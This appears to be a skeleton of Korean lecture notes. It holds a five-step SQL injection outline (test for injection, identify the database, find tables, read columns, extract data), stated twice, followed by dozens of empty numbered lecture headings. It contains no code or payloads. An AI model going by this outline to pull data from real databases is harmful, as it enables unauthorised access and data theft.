0.인젝션에 취약한지 파악
1.데이터 베이스를 알아보자
2.테이블의 이름을 알아보자.
3.테이블의 컬럼의 내용을 확인하자
4. 필요한 정보를 빼보자
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
26강.




0.인젝션에 취약한지 파악
1.데이터 베이스를 알아보자
2.테이블의 이름을 알아보자.
3.테이블의 컬럼의 내용을 확인하자
4. 필요한 정보를 빼보자
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
27강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
28강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
29강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
30강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
31강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
32강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
33강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
34강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
35강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
36강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
37강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
38강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
39강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
40강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
41강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
42강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
43강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
44강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
45강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
46강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
47강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
48강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
49강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
50강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
51강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
52강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
53강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
54강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
55강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
56강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
57강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
58강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
59강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
60강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
61강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
62강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
63강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
64강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
65강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
66강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
67강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
68강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
69강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
70강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
71강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
72강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
73강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
74강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
75강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
76강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
77강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
78강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
79강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
80강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
81강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
82강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
83강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
84강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
85강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
86강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
87강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
88강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
89강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
90강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
91강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
92강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
93강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
94강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
95강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
96강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
97강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
98강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
99강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
100강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
101강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
102강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
103강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
104강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
105강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
106강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
107강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
108강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
109강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
110강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
111강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
112강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
113강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------------------------------------
114강.
----------------------------------------------------------------------------------------------------------------------------------------------------------------

